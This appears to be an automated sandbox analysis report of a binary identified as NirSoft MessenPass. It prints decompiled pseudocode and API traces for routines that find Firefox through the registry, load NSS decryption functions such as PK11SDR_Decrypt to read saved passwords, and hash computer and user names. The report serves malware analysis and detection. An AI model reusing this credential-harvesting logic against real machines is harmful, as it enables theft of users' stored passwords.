									PostMessageA( *(_t124 - 0x27c), 0x415, _t112, _t112);
									_t83 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
									__eflags = _t83;
									if(_t83 == 0) {
										L27:
										 *0x415398();
										goto L28;
									} else {
										_t123 =  *0x415184;
										do {
											_t86 =  *0x415208( *(_t124 - 0x27c),  *((intOrPtr*)(_t124 - 0x264)), _t124 + 0x18);
											__eflags = _t86;
											if(_t86 != 0) {
												goto L26;
											}
											_t89 =  *0x41e1f4;
											__eflags = _t89 - _t112;
											if(_t89 == _t112) {
												L24:
												_t91 =  *_t123( *(_t124 - 0x27c), _t124 + 0x18);
												__eflags = _t91;
												if(_t91 == 0) {
													TranslateMessage(_t124 + 0x18);
													DispatchMessageA(_t124 + 0x18);
												}
												goto L26;
											}
											_t96 =  *_t123(_t89, _t124 + 0x18);
											__eflags = _t96;
											if(_t96 != 0) {
												goto L26;
											}
											goto L24;
											L26:
											_t88 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
											__eflags = _t88;
										} while (_t88 != 0);
										goto L27;
									}
								}
								_t97 = E0040C5A4(_t124 - 0x384, __eflags);
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 = 0;
									__eflags = 0;
									goto L16;
								}
								 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
								0x413d56( *((intOrPtr*)(_t124 + 8)));
								__eflags =  *(_t124 + 4);
								if( *(_t124 + 4) != 0) {
									DeleteObject( *(_t124 + 4));
									 *(_t124 + 4) =  *(_t124 + 4) & 0x00000000;
								}
								goto L30;
							}
							RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
							goto L28;
						}
						 *0x41e390 = 0x41db18;
						E00409167();
						goto L28;
					}
					MessageBoxA(_t112, "Failed to load the executable file !", "Error", 0x30);
					goto L31;
				} else {
					_t73 = _t56 + 1;
					L32:
					return _t73;
				}
			}
























                                          0x0040c66b
                                          0x0040c678
                                          0x0040c67d
                                          0x0040c684
                                          0x0040c68d
                                          0x0040c692
                                          0x0040c697
                                          0x0040c69a
                                          0x0040c69f
                                          0x0040c6a2
                                          0x0040c6a7
                                          0x0040c6a7
                                          0x0040c6b9
                                          0x0040c6c3
                                          0x0040c6c9
                                          0x0040c6ce
                                          0x0040c6d3
                                          0x0040c6d6
                                          0x0040c6f5
                                          0x0040c700
                                          0x0040c707
                                          0x0040c70a
                                          0x0040c70d
                                          0x0040c710
                                          0x0040c713
                                          0x0040c71f
                                          0x0040c722
                                          0x0040c731
                                          0x0040c736
                                          0x0040c738
                                          0x0040c74e
                                          0x0040c75d
                                          0x0040c762
                                          0x0040c764
                                          0x0040c783
                                          0x0040c786
                                          0x0040c8b3
                                          0x0040c8b6
                                          0x0040c8c0
                                          0x0040c8c5
                                          0x0040c8c9
                                          0x0040c8ce
                                          0x0040c8d4
                                          0x0040c8d4
                                          0x0040c8d7
                                          0x0040c8da
                                          0x0040c8e4
                                          0x0040c8ec
                                          0x0040c8f4
                                          0x0040c8fb
                                          0x0040c8fb
                                          0x0040c8fb
                                          0x00000000
                                          0x0040c8fd
                                          0x0040c78f
                                          0x0040c793
                                          0x0040c7d5
                                          0x0040c7d6
                                          0x0040c7e2
                                          0x0040c7e7
                                          0x0040c7ee
                                          0x0040c7f4
                                          0x0040c7f0
                                          0x0040c7f0
                                          0x0040c7f0
                                          0x0040c7fc
                                          0x0040c808
                                          0x0040c829
                                          0x0040c82f
                                          0x0040c842
                                          0x0040c844
                                          0x0040c846
                                          0x0040c8ad
                                          0x0040c8ad
                                          0x00000000
                                          0x0040c848
                                          0x0040c848
                                          0x0040c84e
                                          0x0040c85e
                                          0x0040c864
                                          0x0040c866
                                          0x00000000
                                          0x00000000
                                          0x0040c868
                                          0x0040c86d
                                          0x0040c86f
                                          0x0040c87c
                                          0x0040c886
                                          0x0040c888
                                          0x0040c88a
                                          0x0040c890
                                          0x0040c89a
                                          0x0040c89a
                                          0x00000000
                                          0x0040c88a
                                          0x0040c876
                                          0x0040c878
                                          0x0040c87a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040c8a0
                                          0x0040c8a7
                                          0x0040c8a9
                                          0x0040c8a9
                                          0x00000000
                                          0x0040c84e
                                          0x0040c846
                                          0x0040c79b
                                          0x0040c7a0
                                          0x0040c7a2
                                          0x0040c7d3
                                          0x0040c7d3
                                          0x00000000
                                          0x0040c7d3
                                          0x0040c7a7
                                          0x0040c7b1
                                          0x0040c7b6
                                          0x0040c7bb
                                          0x0040c7c4
                                          0x0040c7ca
                                          0x0040c7ca
                                          0x00000000
                                          0x0040c7bb
                                          0x0040c770
                                          0x00000000
                                          0x0040c770
                                          0x0040c73a
                                          0x0040c744
                                          0x00000000
                                          0x0040c744
                                          0x0040c6e5
                                          0x00000000
                                          0x0040c686
                                          0x0040c686
                                          0x0040c8fe
                                          0x0040c902
                                          0x0040c902

                                          APIs
                                            • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                            • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                            • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                            • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                          • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                          • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                          • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                          • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                          • API String ID: 1343656639-3807849023
                                          • Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                          • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                          • Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                          • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405EC5, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00405EC5(CHAR* _a4) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void** _t44;
				void* _t49;
				void* _t51;
				char* _t54;
				char* _t55;
				char* _t63;
				char* _t67;
				CHAR* _t79;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				_t79 = _a4;
				_t44 =  &_v8;
				 *_t79 = 0;
				0x411d68(0x80000002, "SOFTWARE\Mozilla", _t44);
				_t83 = _t82 + 0x24;
				if(_t44 != 0) {
					L13:
					0x413d0c(_t79,  &_v1052);
					if( *_t79 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\Mozilla Firefox", _t79, 0x104);
						_t49 = E00405E4A(_t79); // executed
						if(_t49 == 0) {
							 *_t79 = 0;
						}
						if( *_t79 == 0) {
							GetCurrentDirectoryA(0x104, _t79);
							_t51 = E00405E4A(_t79); // executed
							if(_t51 == 0) {
								 *_t79 = 0;
							}
						}
					}
					return 0 |  *_t79 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_t54 =  &_v268;
					_v12 = 0;
					0x411dee(_v8, 0, _t54);
					_t84 = _t83 + 0x18;
					while(_t54 == 0) {
						_t55 =  &_v268;
						0x413daa(_t55, "mozilla", 7);
						_t85 = _t84 + 0xc;
						if(_t55 != 0) {
							L10:
							_v12 = _v12 + 1;
							_t54 =  &_v268;
							0x411dee(_v8, _v12, _t54);
							_t84 = _t85 + 0xc;
							continue;
						}
						_v532 = 0;
						memset( &_v531, 0, 0x104);
						_v2076 = 0;
						memset( &_v2075, 0, 0x3ff);
						0x413d9e( &_v2076, 0x3ff, "%s\bin",  &_v268);
						0x411dae(_v8,  &_v2076, "PathToExe", 0x104);
						_t63 =  &_v532;
						0x413da4(_t63, 0x5c);
						_t85 = _t85 + 0x40;
						if(_t63 != 0) {
							 *_t63 = 0;
						}
						if(_v532 != 0 && E00405E4A( &_v532) != 0) {
							_t67 =  &_v268;
							0x413d74(_t67,  &_v788);
							if(_t67 > 0) {
								0x413d0c( &_v1052,  &_v532);
								0x413d0c( &_v788,  &_v268);
								_t85 = _t85 + 0x10;
							}
						}
						_t79 = _a4;
						goto L10;
					}
					RegCloseKey(_v8);
					goto L13;
				}
			}



























                                          0x00405ee1
                                          0x00405ee7
                                          0x00405ef9
                                          0x00405eff
                                          0x00405f04
                                          0x00405f07
                                          0x00405f15
                                          0x00405f17
                                          0x00405f1c
                                          0x00405f21
                                          0x00406072
                                          0x0040607a
                                          0x00406083
                                          0x0040608c
                                          0x00406093
                                          0x0040609a
                                          0x0040609c
                                          0x0040609c
                                          0x004060a0
                                          0x004060a4
                                          0x004060ab
                                          0x004060b2
                                          0x004060b4
                                          0x004060b4
                                          0x004060b2
                                          0x004060a0
                                          0x004060c1
                                          0x00405f27
                                          0x00405f34
                                          0x00405f3a
                                          0x00405f3f
                                          0x00405f4a
                                          0x00405f4d
                                          0x00405f52
                                          0x00406061
                                          0x00405f5c
                                          0x00405f68
                                          0x00405f6d
                                          0x00405f72
                                          0x00406049
                                          0x00406049
                                          0x0040604c
                                          0x00406059
                                          0x0040605e
                                          0x00000000
                                          0x0040605e
                                          0x00405f81
                                          0x00405f87
                                          0x00405f9a
                                          0x00405fa0
                                          0x00405fb9
                                          0x00405fd4
                                          0x00405fd9
                                          0x00405fde
                                          0x00405fe3
                                          0x00405fe8
                                          0x00405fea
                                          0x00405fea
                                          0x00405ff2
                                          0x0040600b
                                          0x00406012
                                          0x0040601b
                                          0x0040602b
                                          0x0040603e
                                          0x00406043
                                          0x00406043
                                          0x0040601b
                                          0x00406046
                                          0x00000000
                                          0x00406046
                                          0x0040606c
                                          0x00000000
                                          0x0040606c

                                          APIs
                                          • memset.MSVCRT ref: 00405EE7
                                          • memset.MSVCRT ref: 00405EFF
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00405F3A
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • _mbsnbicmp.MSVCRT ref: 00405F68
                                          • memset.MSVCRT ref: 00405F87
                                          • memset.MSVCRT ref: 00405FA0
                                          • _snprintf.MSVCRT ref: 00405FB9
                                          • _mbsrchr.MSVCRT ref: 00405FDE
                                          • _mbsicmp.MSVCRT ref: 00406012
                                          • _mbscpy.MSVCRT ref: 0040602B
                                          • _mbscpy.MSVCRT ref: 0040603E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                          • _mbscpy.MSVCRT ref: 0040607A
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                          • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                          • API String ID: 201549630-2797892316
                                          • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                          • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                          • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                          • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410C4C, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00410C6D
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                            • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                            • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                            • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
                                            • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                            • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                          • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                          • memset.MSVCRT ref: 00410CB4
                                          • strlen.MSVCRT ref: 00410CBE
                                          • strlen.MSVCRT ref: 00410CCC
                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                          • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                          • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                          • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                          • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                          • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                          • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                          • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                          • API String ID: 2719586705-3659000792
                                          • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                          • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                          • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                          • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407C79, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00407C79(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24);
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                          0x00407c8a
                                          0x00407c95
                                          0x00407c99
                                          0x00407c9d
                                          0x00407ca1
                                          0x00407ca5
                                          0x00407ca9
                                          0x00407cad
                                          0x00407cb1
                                          0x00407cb5
                                          0x00407cb9
                                          0x00407cbd
                                          0x00407cc1
                                          0x00407cc5
                                          0x00407cc9
                                          0x00407ccd
                                          0x00407cd1
                                          0x00407cd5
                                          0x00407cdb
                                          0x00407ce9
                                          0x00407cef
                                          0x00407d02
                                          0x00407d09
                                          0x00407d17
                                          0x00407d1e
                                          0x00407d29
                                          0x00407d3a
                                          0x00407d3d
                                          0x00407d40
                                          0x00407d51
                                          0x00407d54
                                          0x00407d73
                                          0x00407d88
                                          0x00407d96
                                          0x00407da0
                                          0x00407da5
                                          0x00407da8
                                          0x00407db2
                                          0x00407dbd
                                          0x00407dc2
                                          0x00407dc4
                                          0x00407dca
                                          0x00407dcd
                                          0x00407dd3
                                          0x00407dd9
                                          0x00407dd9
                                          0x00407ddd
                                          0x00407de0
                                          0x00407de9
                                          0x00407deb
                                          0x00407df2
                                          0x00407df3
                                          0x00407dca
                                          0x00407dfb
                                          0x00407dfd
                                          0x00407e00
                                          0x00407e06
                                          0x00407e0c
                                          0x00407e0c
                                          0x00407e15
                                          0x00407e18
                                          0x00407e21
                                          0x00407e23
                                          0x00407e26
                                          0x00407e27
                                          0x00407dfd
                                          0x00407e30

                                          APIs
                                          • memset.MSVCRT ref: 00407CDB
                                          • memset.MSVCRT ref: 00407CEF
                                          • memset.MSVCRT ref: 00407D09
                                          • memset.MSVCRT ref: 00407D1E
                                          • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                          • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                          • strlen.MSVCRT ref: 00407D91
                                          • strlen.MSVCRT ref: 00407DA0
                                          • memcpy.MSVCRT ref: 00407DB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150
                                          • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                          • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                          • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                          • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004110AF, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
                                          • FreeLibrary.KERNEL32(00000000), ref: 0041113F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                          • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
                                          • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                          • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004064FB, Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E004064FB(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v803;
				char _v804;
				void _v1067;
				char _v1068;
				void* __ebx;
				void* __edi;
				signed int _t53;
				signed int _t54;
				int _t61;
				int _t64;
				int _t67;
				void* _t71;
				void* _t73;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr _t115;

				_v8 = _v8 & 0x00000000;
				_t115 = _a4 + 4;
				_v12 = _t115;
				0x410c4c(); // executed
				if(__eax != 0) {
					_v1068 = 0;
					memset( &_v1067, 0, 0x104);
					E00406958(0x104,  &_v1068, _a8);
					_t53 =  *(_t115 + 4);
					if(_t53 == 0) {
						_t54 = _t53 | 0xffffffff;
						__eflags = _t54;
					} else {
						_t54 =  *_t53( &_v1068);
					}
					if(_t54 == 0) {
						_v276 = 0;
						memset( &_v275, 0, 0x104);
						_v804 = 0;
						memset( &_v803, 0, 0x104);
						_v540 = 0;
						memset( &_v539, 0, 0x104);
						_t61 = strlen(_a8);
						_t19 = strlen(0x4181fc) + 1; // 0x1
						if(_t61 + _t19 >= 0x104) {
							_v276 = 0;
						} else {
							E00406B4B( &_v276, _a8, 0x4181fc);
						}
						_t64 = strlen(_a8);
						_t25 = strlen(0x418208) + 1; // 0x1
						if(_t64 + _t25 >= 0x104) {
							_v804 = 0;
						} else {
							E00406B4B( &_v804, _a8, 0x418208);
						}
						_t67 = strlen(_a8);
						_t31 = strlen(0x418218) + 1; // 0x1
						if(_t67 + _t31 >= 0x104) {
							_v540 = 0;
						} else {
							E00406B4B( &_v540, _a8, 0x418218);
						}
						_t71 = E004069D3( &_v276);
						_t131 = _t71;
						if(_t71 != 0) {
							E004062DB(_t131, _a4,  &_v276);
						}
						_t73 = E004069D3( &_v804);
						_t132 = _t73;
						if(_t73 != 0) {
							E004062DB(_t132, _a4,  &_v804);
						}
						_t75 = E004069D3( &_v540);
						_t133 = _t75;
						if(_t75 != 0) {
							E004062DB(_t133, _a4,  &_v540);
						}
						_t76 =  *((intOrPtr*)(_v12 + 8));
						_v8 = 1;
						if(_t76 != 0) {
							 *_t76();
						}
					}
					0x410d6f();
				}
				return _v8;
			}

























                                          0x00406504
                                          0x0040650d
                                          0x00406511
                                          0x00406514
                                          0x0040651b
                                          0x00406530
                                          0x00406537
                                          0x00406548
                                          0x0040654d
                                          0x00406555
                                          0x00406563
                                          0x00406563
                                          0x00406557
                                          0x0040655e
                                          0x00406560
                                          0x00406568
                                          0x00406577
                                          0x0040657e
                                          0x0040658f
                                          0x00406596
                                          0x004065a7
                                          0x004065ae
                                          0x004065b9
                                          0x004065cc
                                          0x004065d3
                                          0x004065e8
                                          0x004065d5
                                          0x004065df
                                          0x004065e5
                                          0x004065f2
                                          0x00406605
                                          0x0040660c
                                          0x00406621
                                          0x0040660e
                                          0x00406618
                                          0x0040661e
                                          0x0040662b
                                          0x0040663e
                                          0x00406645
                                          0x0040665a
                                          0x00406647
                                          0x00406651
                                          0x00406657
                                          0x00406668
                                          0x0040666d
                                          0x00406670
                                          0x0040667c
                                          0x0040667c
                                          0x00406688
                                          0x0040668d
                                          0x00406690
                                          0x0040669c
                                          0x0040669c
                                          0x004066a8
                                          0x004066ad
                                          0x004066b0
                                          0x004066bc
                                          0x004066bc
                                          0x004066c4
                                          0x004066c9
                                          0x004066d0
                                          0x004066d2
                                          0x004066d2
                                          0x004066d0
                                          0x004066d4
                                          0x004066d4
                                          0x004066e0

                                          APIs
                                            • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                            • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                            • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                            • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                            • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                            • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                            • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                            • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                          • memset.MSVCRT ref: 00406537
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • memset.MSVCRT ref: 0040657E
                                          • memset.MSVCRT ref: 00406596
                                          • memset.MSVCRT ref: 004065AE
                                          • strlen.MSVCRT ref: 004065B9
                                          • strlen.MSVCRT ref: 004065C7
                                          • strlen.MSVCRT ref: 004065F2
                                          • strlen.MSVCRT ref: 00406600
                                          • strlen.MSVCRT ref: 0040662B
                                          • strlen.MSVCRT ref: 00406639
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                            • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                            • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                            • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                            • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                            • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                            • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
